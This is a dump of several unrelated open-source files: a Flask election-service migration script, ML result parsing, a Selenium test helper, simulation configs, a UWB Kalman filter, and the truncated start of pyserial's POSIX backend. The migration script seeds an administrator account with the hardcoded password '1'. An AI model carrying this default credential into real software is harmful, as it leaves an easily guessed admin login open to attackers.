anae09/electionWebService
|
756968e5cd6db1422ae5fe8445a9e92a25953073
|
[
"MIT"
] | null | null | null |
authentication/migrate.py
|
anae09/electionWebService
|
756968e5cd6db1422ae5fe8445a9e92a25953073
|
[
"MIT"
] | null | null | null |
from flask import Flask;
from configuration import Configuration;
from flask_migrate import Migrate, init, migrate, upgrade;
from models import database, Role, UserRole, User;
from sqlalchemy_utils import database_exists, create_database;
application = Flask(__name__);
application.config.from_object(Configuration);
migrateObject = Migrate(application, database);
done = False;
while not done:
try:
if not database_exists(application.config["SQLALCHEMY_DATABASE_URI"]):
create_database(application.config["SQLALCHEMY_DATABASE_URI"]);
database.init_app(application);
with application.app_context() as context:
init();
migrate(message="Production migration");
upgrade();
adminRole = Role(name="administrator");
userRole = Role(name="user");
database.session.add(adminRole);
database.session.add(userRole);
database.session.commit();
admin = User(
jmbg="0000000000000",
forename="admin",
surname="admin",
email="admin@admin.com",
password="1"
);
database.session.add(admin);
database.session.commit();
userRole = UserRole(
userId=admin.id,
roleId=adminRole.id
);
database.session.add(userRole);
database.session.commit();
done = True;
except Exception as err:
print(err);
| 28.2
| 78
| 0.595745
| 144
| 1,551
| 6.298611
| 0.395833
| 0.115766
| 0.079383
| 0.077178
| 0.187431
| 0.103638
| 0.103638
| 0
| 0
| 0
| 0
| 0.012975
| 0.30432
| 1,551
| 54
| 79
| 28.722222
| 0.827618
| 0
| 0
| 0.170732
| 0
| 0
| 0.078659
| 0.029658
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0.02439
| 0.121951
| 0
| 0.121951
| 0.02439
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
866b8b6db3282415cf332ea707795a1897c51203
| 4,066
|
py
|
Python
|
output/ensemble_analysis.py
|
gitter-lab/pria-ams-enamine
|
b37bc7edf3c21af6653267ecd4bb9fd232eeb575
|
[
"MIT"
] | 1
|
2021-09-28T23:10:05.000Z
|
2021-09-28T23:10:05.000Z
|
output/ensemble_analysis.py
|
gitter-lab/pria-ams-enamine
|
b37bc7edf3c21af6653267ecd4bb9fd232eeb575
|
[
"MIT"
] | null | null | null |
output/ensemble_analysis.py
|
gitter-lab/pria-ams-enamine
|
b37bc7edf3c21af6653267ecd4bb9fd232eeb575
|
[
"MIT"
] | null | null | null |
from __future__ import print_function
import os
import json
import numpy as np
def extract(file_path):
if not os.path.isfile(file_path):
return -1, -1, -1
with open(file_path, 'r') as f:
lines = f.readlines()
test_roc, test_precision, test_NEF = -1, -1, -1
for line in lines:
if 'test precision' in line:
line = line.strip().split(':')
test_precision = float(line[1])
if 'test roc' in line:
line = line.strip().split(':')
test_roc = float(line[1])
if 'ratio: 0.01, NEF:' in line:
line = line.strip().replace('NEF:', '').split(',')
test_NEF = float(line[1])
return test_roc, test_precision, test_NEF
if __name__ == '__main__':
model_list = [
'random_forest_classification',
'xgboost_classification', 'xgboost_regression',
'single_deep_classification', 'single_deep_regression'
]
model_process_num_list = {
'random_forest_classification': [139, 69, 111, 212, 210, 148, 28, 61, 124, 130, 131, 141, 14, 38, 165, 65, 123, 94, 3, 88, 72],
'xgboost_classification': [140, 967, 960, 807, 263, 694, 440, 47, 116, 792, 663, 32, 564, 950, 735, 84, 364, 605, 431, 55, 388],
'xgboost_regression': [187, 6, 514, 507, 880, 440, 605, 718, 754, 409, 586, 214, 753, 65, 294, 911, 721, 81, 321, 545, 280],
'single_deep_classification': [356, 404, 215, 93, 254, 88, 423, 47, 363, 132, 5, 385, 370, 29, 415, 54, 124, 183, 180, 416],
'single_deep_regression': [199, 323, 114, 123, 47, 175, 17, 178, 106, 265, 67, 157, 369, 115, 191, 20, 27, 108, 270, 45],
'ensemble': [0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12]
}
for model in model_list:
print('Model: {}'.format(model))
number = len(model_process_num_list[model])
hyper_parameter_result_roc = []
hyper_parameter_result_precision = []
hyper_parameter_result_NEF = []
for running_process in model_process_num_list[model]:
test_roc_list, test_precision_list, test_NEF_list = [], [], []
for idx in range(4):
file_path = '{}/{}_{}_{}.out'.format(model, model, running_process, idx)
test_roc, test_precision, test_NEF = extract(file_path)
if test_roc == -1 and test_precision == -1:
print('missing index: {}'.format(running_process))
if test_roc != -1:
test_roc_list.append(test_roc)
if test_precision != -1:
test_precision_list.append(test_precision)
if test_NEF != -1:
test_NEF_list.append(test_NEF)
hyper_parameter_result_roc.append(np.mean(test_roc_list))
hyper_parameter_result_precision.append(np.mean(test_precision_list))
hyper_parameter_result_NEF.append(np.mean(test_NEF_list))
for running_process, roc, pr, NEF in zip(model_process_num_list[model], hyper_parameter_result_roc, hyper_parameter_result_precision, hyper_parameter_result_NEF):
print('{}\t{}\t{}\t{}'.format(running_process, roc, pr, NEF))
print()
print('On The Last Folder')
model_list = [
'random_forest_classification',
'xgboost_classification', 'xgboost_regression',
'single_deep_classification', 'single_deep_regression',
'ensemble'
]
for model in model_list:
print('Model: {}'.format(model))
number = len(model_process_num_list[model])
for running_process in model_process_num_list[model]:
if model == 'ensemble':
file_path = '{}/{}.out'.format(model, running_process)
else:
file_path = '{}/{}_{}_4.out'.format(model, model, running_process)
test_roc, test_precision, test_NEF = extract(file_path)
print('{}\t{}'.format(running_process, test_NEF))
print()
| 42.354167
| 171
| 0.58485
| 518
| 4,066
| 4.303089
| 0.34556
| 0.037685
| 0.080754
| 0.051144
| 0.445491
| 0.403769
| 0.349933
| 0.324809
| 0.324809
| 0.248542
| 0
| 0.107475
| 0.286031
| 4,066
| 96
| 172
| 42.354167
| 0.660351
| 0
| 0
| 0.25641
| 0
| 0
| 0.135448
| 0.074018
| 0
| 0
| 0
| 0
| 0
| 1
| 0.012821
| false
| 0
| 0.051282
| 0
| 0.089744
| 0.115385
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
866be250cb91ad06867da752bf60c3e580b71448
| 1,687
|
py
|
Python
|
openstack_dashboard/test/integration_tests/regions/messages.py
|
ankur-gupta91/block_storage
|
938548a3d4507dc56c1c26b442767eb41aa2e610
|
[
"Apache-2.0"
] | 1
|
2021-01-02T03:34:19.000Z
|
2021-01-02T03:34:19.000Z
|
openstack_dashboard/test/integration_tests/regions/messages.py
|
ankur-gupta91/block_storage
|
938548a3d4507dc56c1c26b442767eb41aa2e610
|
[
"Apache-2.0"
] | null | null | null |
openstack_dashboard/test/integration_tests/regions/messages.py
|
ankur-gupta91/block_storage
|
938548a3d4507dc56c1c26b442767eb41aa2e610
|
[
"Apache-2.0"
] | null | null | null |
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from selenium.common.exceptions import NoSuchElementException
from selenium.webdriver.common import by
from openstack_dashboard.test.integration_tests.regions import baseregion
ERROR = 'alert-danger'
INFO = 'alert-info'
SUCCESS = 'alert-success'
class MessageRegion(baseregion.BaseRegion):
_close_locator = (by.By.CSS_SELECTOR, 'a.close')
def _msg_locator(self, level):
return (by.By.CSS_SELECTOR, 'div.alert.%s' % level)
def __init__(self, driver, conf, level=SUCCESS):
self._default_src_locator = self._msg_locator(level)
# NOTE(tsufiev): we cannot use self._turn_off_implicit_wait() at this
# point, because the instance is not initialized by ancestor's __init__
driver.implicitly_wait(0)
try:
super(MessageRegion, self).__init__(driver, conf)
except NoSuchElementException:
self.src_elem = None
finally:
self._turn_on_implicit_wait()
def exists(self):
return self._is_element_displayed(self.src_elem)
def close(self):
self._get_element(*self._close_locator).click()
| 36.673913
| 79
| 0.711322
| 224
| 1,687
| 5.165179
| 0.535714
| 0.051858
| 0.022472
| 0.027658
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.003731
| 0.205691
| 1,687
| 45
| 80
| 37.488889
| 0.859701
| 0.405453
| 0
| 0
| 0
| 0
| 0.054767
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.173913
| false
| 0
| 0.130435
| 0.086957
| 0.478261
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
866d362b7d20329b9a8556ff353eba1624b11b05
| 8,175
|
py
|
Python
|
model_input.py
|
bgarbin/GUIDE
|
06bca4e696b97ca14c11d74844d3b3ab7287f8f1
|
[
"MIT"
] | null | null | null |
model_input.py
|
bgarbin/GUIDE
|
06bca4e696b97ca14c11d74844d3b3ab7287f8f1
|
[
"MIT"
] | null | null | null |
model_input.py
|
bgarbin/GUIDE
|
06bca4e696b97ca14c11d74844d3b3ab7287f8f1
|
[
"MIT"
] | null | null | null |
# -*- coding: utf-8 -*-
import numpy as np
#import cmath as cm
# Main parameters for window
# 'record_every': number of time_steps one between two consecutive record events
window_params = {'kernel': 'RK4','nstep_update_plot': 100, 'step_size': 0.01, 'array_size': 10000, 'streaming': True, 'record_state':False, 'nstep_record':1, 'window_size':(1200,1000), 'invert_order_obs_var': True,'theme':'dark'}
# Definition of the plot configuration
def load_docks():
''' Returns a dict to be used for plots declaration. Here, we use pyqtgraph docks. Each plot has a dictionnary as "value" with keys: "type" (accepted values: 'plot' and 'image'), "zoomOf" (key name of another dock), "position" (accepted values: 'bottom', 'top', 'left', 'right', 'above', or 'below'), "relativeTo" (optional, key name of another dock; position relative to another dock), size [(xlength,ylength); note that lengths arguments are only a suggestion; docks will still have to fill the entire dock area and obey the limits of their internal widgets], "labels" (dict of position:str), "title" (str). '''
docks = {
'plot1' : {'type': 'plot1D' , 'position': 'left' , 'size': (500,500), 'labels':{'bottom':'Time (arb. units)','left':'Intensity (arb. units)'}},
'phase_space' : {'type': 'plot2D', 'position': 'right', 'size': (300,300)},
'plot2' : {'type': 'plot1D' , 'zoomOf': 'plot1' , 'position': 'bottom', 'relativeTo': 'phase_space', 'size': (300,100)},
'plot3' : {'type': 'plot1D', 'position': 'top','relativeTo':'phase_space', 'size': (300,300)},
'custom_name' : {'type': 'image', 'position': 'above','relativeTo':'plot3', 'size': (300,300)},
}
return docks
def load_variables():
''' Returns a dict of the variables. Each variable is a dict with keys: "type" (e.g. np.float64, np.complex128), "init_cond" (type), "plot" (bool, optional default is True), "dock" (list of key name(s) of docks [str] as defined in load_dock function; optional; if not provided, will be ploted on every plot), "equation" (callable, optional default is diff_eq_{variable_name}), "help" (str, to be displayed in help message). Additionnal keys are added internally: "value", "observable" (False), "lineedit", "checkbox". '''
variables = {
'A' : {'type': np.complex128, 'init_cond': 0., 'plot': False, 'dock':['plot1','plot2'], 'help':'field in the first cavity'},
'B' : {'type': np.complex128, 'init_cond': 0.001, 'plot': False, 'equation': diff_eq_B}
}
return variables
def load_observables():
''' Returns a dict of the observables. Similar to variables, observables are added internally to the dictionnary of variables. Each observable is a dict with keys: "type" (e.g. np.float64, np.complex128), "init_cond" (type), "plot" (bool, optional default is True), "dock" (list of key name(s) of docks [str] as defined in load_dock function; optional; if not provided, will be ploted on every plot), "equation" (callable, optional default is eq_{variable_name}), "calculation_size" (bool, whether you want according variable to be only the size of what calculation returns; WARNING: those items won't be stored), "help" (str, to be displayed in help message). Additionnal keys are added internally: "value", "observable" (True), "lineedit", "checkbox". '''
observables = {
'mod_A' : {'type': np.float64, 'init_cond': 0., 'plot': True, 'dock':['plot1','plot2'], 'help':'modulus square of A'},
'mod_B' : {'type': np.float64, 'init_cond': 0., 'dock':['plot1','plot2','plot3']},
'mod_A_2' : {'type': np.float64, 'init_cond': 0., 'plot': True, 'dock':[{'phase_space':['mod_A_2','mod_B_2']}],'calculation_size':True, 'help':'abs(A)**2 shorter to be plotted in phase space'},
'mod_B_2' : {'type': np.float64, 'init_cond': 0. ,'dock':[{'phase_space':['mod_B_2','mod_A_2']}],'calculation_size':True},
'mod_A_2D' : {'type': np.float64, 'init_cond': 0. ,'dock':['custom_name'],'calculation_size':True,'help':'variable to be used plotted in image'},
#'ph_A' : {'type': np.float64, 'init_cond': 0., 'dock':['plot3']},
#'ph_B' : {'type': np.float64, 'init_cond': 0., 'dock':['plot3']}
}
return observables
def load_params():
''' Returns a dict of the parameters. Similarly to variables/observables, each parameter has a dictionnary as "value" with keys: "init_cond" (float), "min" (float), "max" (float), step (float or int; WARNING if int this parameter will be an integer), "help" (str, to be displayed in help message). Additionnal keys are added internally: "value", "spinbox", "slider", "slider_conversion_factor". '''
params = {}
params['delta'] = {'init_cond': -8., 'min': -10., 'max': 10., 'step': 0.01, 'help':'detuning parameter'}
params['f'] = {'init_cond': 4.8, 'min': 0. , 'max': 20., 'step': 0.01}
params['kappa'] = {'init_cond': 2.8, 'min': 0. , 'max': 10., 'step': 0.01}
params['gamma'] = {'init_cond': 0. , 'min': -1. , 'max': 1., 'step': 0.01}
params['tau'] = {'init_cond': 1. , 'min': 0. , 'max': 10., 'step': 0.01}
params['npts_PS'] = {'init_cond': 1000 , 'min': 1 , 'max': 2000, 'step': 1}
params['folding'] = {'init_cond': 100 , 'min': 1 , 'max': 1000, 'step': 1}
params['min_scan'] = {'init_cond': 0, 'min': 0., 'max': 500., 'step': 0.01, 'help':'detuning parameter'}
params['max_scan'] = {'init_cond': 10, 'min': 0., 'max': 500., 'step': 0.01, 'help':'detuning parameter'}
params['step_scan'] = {'init_cond': 0.05, 'min': 0.001, 'max': 10., 'step': 0.001, 'help':'detuning parameter'}
params['nstep_scan'] = {'init_cond': 50, 'min': 0, 'max': 500, 'step': 1, 'help':'detuning parameter'}
return params
# BEGIN Declaration of the equations. Automatically recognized pattern are "diff_eq_{variable}" (variables) and "eq_{observable}" (observables); with a name after the pattern that must match the variable/observable's one. Alternatively, you may use custom equation names. You should declare it in the variable/observable dictionnary with keyword "equation".
def diff_eq_A(ui,variables, params):
return 1j*(params['delta']*params['tau'] + abs(variables['A'])**2)*variables['A'] - variables['A'] + (1j*params['kappa'] + params['gamma'])*params['tau']*variables['B'] + params['f']
def diff_eq_B(ui,variables, params):
return 1j*(params['delta']*params['tau'] + abs(variables['B'])**2)*variables['B'] - variables['B'] + (1j*params['kappa'] + params['gamma'])*params['tau']*variables['A'] + params['f']
def eq_mod_A(ui,variables,params):
return abs(variables['A'])**2
def eq_mod_B(ui,variables,params):
return abs(variables['B'])**2
def eq_mod_A_2(ui,variables,params):
return variables['mod_A'][-params['npts_PS']:]
def eq_mod_B_2(ui,variables,params):
return variables['mod_B'][-params['npts_PS']:]
def eq_mod_A_2D(ui,variables,params):
folding = params['folding']
nb_rt = int(len(variables['mod_A'])/params['folding'])
return np.reshape(variables['mod_A'][-(folding*nb_rt):],(nb_rt,folding))
#def eq_ph_A(variables,params):
#return [cm.phase(temp) for temp in variables['A']] #np.array(np.arctan2(np.imag(variables['A']), np.real(variables['A'])))
#def eq_ph_B(variables,params):
#return [cm.phase(temp) for temp in variables['B']]
def keyboard_keys():
""" Returns a dictionnary of user defined keys of form key:callable. System reserved keys: [" ", "q", "h", "s", "r", "i", "c"]. This must return an empty dict if no extra keys. """
keys = {
't': ramp_f,
}
return keys
#return {}
def ramp_f(ui,variables,params):
print('begin scanning')
for f in np.concatenate((np.arange(params['min_scan'],params['max_scan']+params['step_scan'],params['step_scan']),np.arange(params['max_scan'],params['min_scan']-params['step_scan'],-params['step_scan']))):
f = round(f,2)
ui.set_param('f',f)
ui.run_simulator(params['nstep_scan'])
print('end scanning')
def kernel_my_own(variables,params):
''' Takes as arguments dicts of variables and params as {'key':value}. Returns a dict of the results with the same form. For now the function name must start with "kernel_" '''
pass
| 65.4
| 761
| 0.651865
| 1,191
| 8,175
| 4.361041
| 0.235936
| 0.035425
| 0.020793
| 0.022911
| 0.371005
| 0.337505
| 0.295918
| 0.240855
| 0.198883
| 0.185791
| 0
| 0.032697
| 0.154495
| 8,175
| 124
| 762
| 65.927419
| 0.71875
| 0.431437
| 0
| 0
| 0
| 0
| 0.318399
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.2
| false
| 0.014286
| 0.014286
| 0.085714
| 0.385714
| 0.028571
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
866eb114075c78f8e3231df363ccab857402a80e
| 1,464
|
py
|
Python
|
input/EnvEq/pairwise/Tneg-Tpro/u_lim_o2Tpro-u_lim_o2Tneg/parallelizer.py
|
Harshavardhan-BV/Cancer-compe-strat
|
e4decacd5779e85a68c81d0ce3bedf42dea2964f
|
[
"MIT"
] | 1
|
2020-10-18T15:54:26.000Z
|
2020-10-18T15:54:26.000Z
|
input/EnvEq/pairwise/Tneg-Tpro/u_lim_o2Tpro-u_lim_o2Tneg/parallelizer.py
|
Harshavardhan-BV/Cancer-compe-strat
|
e4decacd5779e85a68c81d0ce3bedf42dea2964f
|
[
"MIT"
] | null | null | null |
input/EnvEq/pairwise/Tneg-Tpro/u_lim_o2Tpro-u_lim_o2Tneg/parallelizer.py
|
Harshavardhan-BV/Cancer-compe-strat
|
e4decacd5779e85a68c81d0ce3bedf42dea2964f
|
[
"MIT"
] | null | null | null |
from multiprocessing import Pool
import EnvEq as ee
import numpy as np
import itertools as it
import os
#parsing input into numpy arrays
from input import *
y0=np.array([y0_Tpos,y0_Tpro,y0_Tneg,y0_o2,y0_test])
p=np.array([p_o2,p_test])
mu=np.array([[mu_o2Tpos,mu_o2Tpro,mu_o2Tneg],[mu_testTpos,mu_testTpro,0]])
lam=np.array([lam_o2,lam_test])
t_D=np.array([t_DTpos,t_DTpro,t_DTneg])
r=np.array([r_Tpos,r_Tpro,r_Tneg])
delta=np.array([delta_Tpos,delta_Tpro,delta_Tneg])
rho=np.array([rho_Tpos,rho_Tpro,rho_Tneg])
lim=np.array([[[l_lim_o2Tpos,u_lim_o2Tpos],[l_lim_o2Tpro,u_lim_o2Tpro],[l_lim_o2Tneg,u_lim_o2Tneg]],[[l_lim_testTpos,u_lim_testTpos],[l_lim_testTpro,u_lim_testTpro],[0,0]]],dtype=np.float64)
#make directories for saving raw_outputs
try:
os.makedirs("../../raw_output/EnvEq/"+f_name)
except:
pass
#iterator over these
o2_lim_arr=np.empty([0,2])
for ulim_Tpro in np.arange(0.1,1,0.2):
for ulim_Tneg in np.arange(0.1,1,0.2):
o2_lim_arr=np.append(o2_lim_arr,[[ulim_Tpro,ulim_Tneg]],axis=0)
def solve_parm(u_lim_o2): #calls the solve_eq function with all default inputs other than o2_lim
f_name_i=f_name+"{:.1f}".format(u_lim_o2[0])+"-"+"{:.1f}".format(u_lim_o2[1])
lim[0,1,1]=u_lim_o2[0]
lim[0,2,1]=u_lim_o2[1]
ee.solve_eq(t_max,dt,y0,p,mu,lam,r,K,delta,rho,lim,f_name_i)
if __name__ == '__main__':
pool = Pool(4)
pool.map(solve_parm,o2_lim_arr) #iterate over the o2_lims
pool.close()
pool.join()
| 34.046512
| 190
| 0.733607
| 296
| 1,464
| 3.317568
| 0.327703
| 0.040733
| 0.03055
| 0.020367
| 0.059063
| 0.03055
| 0.03055
| 0.03055
| 0
| 0
| 0
| 0.046353
| 0.101093
| 1,464
| 42
| 191
| 34.857143
| 0.699848
| 0.125
| 0
| 0
| 0
| 0
| 0.034483
| 0.018025
| 0
| 0
| 0
| 0
| 0
| 1
| 0.030303
| false
| 0.030303
| 0.181818
| 0
| 0.212121
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
866f56e685c4eea3f8e5c6a81ebbf185f955f32d
| 4,495
|
py
|
Python
|
task1_makeTrainingDataset.py
|
1985312383/contest
|
c4734647ad436cf5884075f906a3e9f10fc4dcfa
|
[
"Apache-2.0"
] | 2
|
2021-12-10T08:38:47.000Z
|
2021-12-31T08:44:18.000Z
|
task1_makeTrainingDataset.py
|
huxiaoyi0625/Mathematical_Modeling_Contest_E_2021
|
40293aa2375daa46d2351870c72394d4e1114081
|
[
"Apache-2.0"
] | null | null | null |
task1_makeTrainingDataset.py
|
huxiaoyi0625/Mathematical_Modeling_Contest_E_2021
|
40293aa2375daa46d2351870c72394d4e1114081
|
[
"Apache-2.0"
] | null | null | null |
import csv
import re
import numpy as np
thre = 1.5 # 要调整的参数,这个是阈值
iteration_num = 2 # 要调整的参数,这个是迭代次数
def KalmanFilter(z, n_iter=20):
# 卡尔曼滤波
# 这里是假设A=1,H=1的情况
# intial parameters
sz = (n_iter,) # size of array
# Q = 1e-5 # process variance
Q = 1e-6 # process variance
# allocate space for arrays
xhat = np.zeros(sz) # a posteri estimate of x
P = np.zeros(sz) # a posteri error estimate
xhatminus = np.zeros(sz) # a priori estimate of x
Pminus = np.zeros(sz) # a priori error estimate
K = np.zeros(sz) # gain or blending factor
R = 0.015 ** 2 # estimate of measurement variance, change to see effect
# intial guesses
xhat[0] = 0.0
P[0] = 1.0
A = 1
H = 1
for k in range(1, n_iter):
# time update
xhatminus[k] = A * xhat[k - 1] # X(k|k-1) = AX(k-1|k-1) + BU(k) + W(k),A=1,BU(k) = 0
Pminus[k] = A * P[k - 1] + Q # P(k|k-1) = AP(k-1|k-1)A' + Q(k) ,A=1
# measurement update
K[k] = Pminus[k] / (Pminus[k] + R) # Kg(k)=P(k|k-1)H'/[HP(k|k-1)H' + R],H=1
xhat[k] = xhatminus[k] + K[k] * (z[k] - H * xhatminus[k]) # X(k|k) = X(k|k-1) + Kg(k)[Z(k) - HX(k|k-1)], H=1
P[k] = (1 - K[k] * H) * Pminus[k] # P(k|k) = (1 - Kg(k)H)P(k|k-1), H=1
return xhat
def data_process(file_path: str):
with open(file_path, "r") as f: # 打开文件
f.readline() # 去掉第一行
data = f.readlines() # 读取文件
data_num = len(data) / 4
if int(data_num) - data_num < -0.1:
raise ValueError("数据数量不对!")
initial_time = re.search(":.*:([0-9]*)", data[0], flags=0) # 获取初始数据序列
initial_time = int(initial_time.group(1))
Measures = []
for i in range(int(data_num)):
measure = []
for j in range(4):
device = []
anchor = re.search(":[0-9]*?:RR:0:([0-9]):[0-9]*?:([0-9]*?):[0-9]*?:([0-9]*)", data[4 * i + j], flags=0)
device.extend([int(anchor.group(3)) - initial_time, anchor.group(1), anchor.group(2)]) # 获取数据序号、设备号、测量值
device = list(map(int, device))
measure.append(device) # 一个measure就是四个设备拿到的四份数据
Measures.append(measure)
Measures = np.array(Measures) # Measures是三维数组是获取的所有测量数据
normalized_device_data = []
normalized_device_data_x = []
device_data = []
device_data_x = []
for i in range(4):
device_data.append(Measures[:, i, 2])
device_data_x.append(np.arange(len(Measures[:, i, 2])))
normalized_device_data.append(device_data[i] / np.max(Measures[:, i, 2])) # 最大值归一化
normalized_device_data_x = device_data_x
normalized_device_data = np.array(normalized_device_data)
normalized_device_data_x = np.array(normalized_device_data_x)
device_data = np.array(device_data)
device_data_x = np.array(device_data_x)
processed_device_data = np.array(device_data).copy()
device_mean = np.mean(device_data, axis=1)
device_std = np.std(device_data, axis=1)
low_thre = device_mean - device_std * thre # 去除离群点
high_thre = device_mean + device_std * thre # 去除离群点
for _ in range(iteration_num):
for i in range(4):
for j in range(len(device_data[i, :])):
if device_data[i, j] < low_thre[i] or device_data[i, j] > high_thre[i]:
processed_device_data[i, j] = device_mean[i]
xhat = []
for i in range(4):
# raw_data = device_data[i]
raw_data = processed_device_data[i]
xhat.append(KalmanFilter(raw_data, n_iter=len(raw_data)))
xhat = np.array(xhat)
xhat = np.around(xhat, 1) # 将滤波后的四组坐标值,保留一位小数
return device_data, xhat # device_data为原始数据,xhat是离群点去除且卡尔曼滤波后的数据
def save_data(file_path: str, Measures):
with open(file_path, "w+", newline="") as datacsv:
# dialect为打开csv文件的方式,默认是excel,delimiter="\t"参数指写入的时候的分隔符
csvwriter = csv.writer(datacsv, dialect=("excel"))
# csv文件插入一行数据,把下面列表中的每一项放入一个单元格(可以用循环插入多行)
csvwriter.writerow(["Number", "A0", "A1", "A2", "A3"])
csvwriter.writerows(np.column_stack((np.arange(Measures.shape[1]), Measures.T)), )
def collect_dataset(kind):
for i in range(1, 325):
file_path = f"./data/附件1:UWB数据集/{kind}数据/{i}.{kind}.txt"
original_data, final_processed_data = data_process(file_path)
save_data(f"cleaned_data/{kind}数据/{i}.{kind}.csv", final_processed_data)
def collect_labels():
pass
if __name__ == '__main__':
collect_dataset("正常")
collect_dataset("异常")
| 36.544715
| 117
| 0.602447
| 691
| 4,495
| 3.761216
| 0.259045
| 0.111581
| 0.038092
| 0.021162
| 0.172374
| 0.104656
| 0.060023
| 0.003848
| 0
| 0
| 0
| 0.026956
| 0.240712
| 4,495
| 122
| 118
| 36.844262
| 0.734544
| 0.193103
| 0
| 0.033333
| 0
| 0.011111
| 0.051854
| 0.037078
| 0
| 0
| 0
| 0
| 0
| 1
| 0.055556
| false
| 0.011111
| 0.033333
| 0
| 0.111111
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
86720b27c369fdf8140425890d2127c46b5bc111
| 24,252
|
py
|
Python
|
editing files/Portable Python 3.2.5.1/App/Lib/site-packages/serial/serialposix.py
|
mattl1598/testing
|
cd8124773b83a07301c507ffbb9ccaafbfe7a274
|
[
"Unlicense"
] | null | null | null |
editing files/Portable Python 3.2.5.1/App/Lib/site-packages/serial/serialposix.py
|
mattl1598/testing
|
cd8124773b83a07301c507ffbb9ccaafbfe7a274
|
[
"Unlicense"
] | 1
|
2018-04-15T22:59:15.000Z
|
2018-04-15T22:59:15.000Z
|
editing files/Portable Python 3.2.5.1/App/Lib/site-packages/serial/serialposix.py
|
mattl1598/Project-Mochachino
|
cd8124773b83a07301c507ffbb9ccaafbfe7a274
|
[
"Unlicense"
] | null | null | null |
#!/usr/bin/env python
#
# Python Serial Port Extension for Win32, Linux, BSD, Jython
# module for serial IO for POSIX compatible systems, like Linux
# see __init__.py
#
# (C) 2001-2010 Chris Liechti <cliechti@gmx.net>
# this is distributed under a free software license, see license.txt
#
# parts based on code from Grant B. Edwards <grante@visi.com>:
# ftp://ftp.visi.com/users/grante/python/PosixSerial.py
#
# references: http://www.easysw.com/~mike/serial/serial.html
import sys, os, fcntl, termios, struct, select, errno, time
from .serialutil import *
# Do check the Python version as some constants have moved.
if (sys.hexversion < 0x020100f0):
import TERMIOS
else:
TERMIOS = termios
if (sys.hexversion < 0x020200f0):
import FCNTL
else:
FCNTL = fcntl
# try to detect the OS so that a device can be selected...
# this code block should supply a device() and set_special_baudrate() function
# for the platform
plat = sys.platform.lower()
if plat[:5] == 'linux': # Linux (confirmed)
def device(port):
return '/dev/ttyS%d' % port
ASYNC_SPD_MASK = 0x1030
ASYNC_SPD_CUST = 0x0030
def set_special_baudrate(port, baudrate):
import array
buf = array.array('i', [0] * 32)
# get serial_struct
FCNTL.ioctl(port.fd, TERMIOS.TIOCGSERIAL, buf)
# set custom divisor
buf[6] = buf[7] / baudrate
# update flags
buf[4] &= ~ASYNC_SPD_MASK
buf[4] |= ASYNC_SPD_CUST
# set serial_struct
try:
res = FCNTL.ioctl(port.fd, TERMIOS.TIOCSSERIAL, buf)
except IOError:
raise ValueError('Failed to set custom baud rate: %r' % baudrate)
baudrate_constants = {
0: 0000000, # hang up
50: 0o000001,
75: 0o000002,
110: 0o000003,
134: 0o000004,
150: 0o000005,
200: 0o000006,
300: 0o000007,
600: 0o000010,
1200: 0o000011,
1800: 0o000012,
2400: 0o000013,
4800: 0o000014,
9600: 0o000015,
19200: 0o000016,
38400: 0o000017,
57600: 0o010001,
115200: 0o010002,
230400: 0o010003,
460800: 0o010004,
500000: 0o010005,
576000: 0o010006,
921600: 0o010007,
1000000: 0o010010,
1152000: 0o010011,
1500000: 0o010012,
2000000: 0o010013,
2500000: 0o010014,
3000000: 0o010015,
3500000: 0o010016,
4000000: 0o010017
}
elif plat == 'cygwin': # cygwin/win32 (confirmed)
def device(port):
return '/dev/com%d' % (port + 1)
def set_special_baudrate(port, baudrate):
raise ValueError("sorry don't know how to handle non standard baud rate on this platform")
baudrate_constants = {}
elif plat == 'openbsd3': # BSD (confirmed)
def device(port):
return '/dev/ttyp%d' % port
def set_special_baudrate(port, baudrate):
raise ValueError("sorry don't know how to handle non standard baud rate on this platform")
baudrate_constants = {}
elif plat[:3] == 'bsd' or \
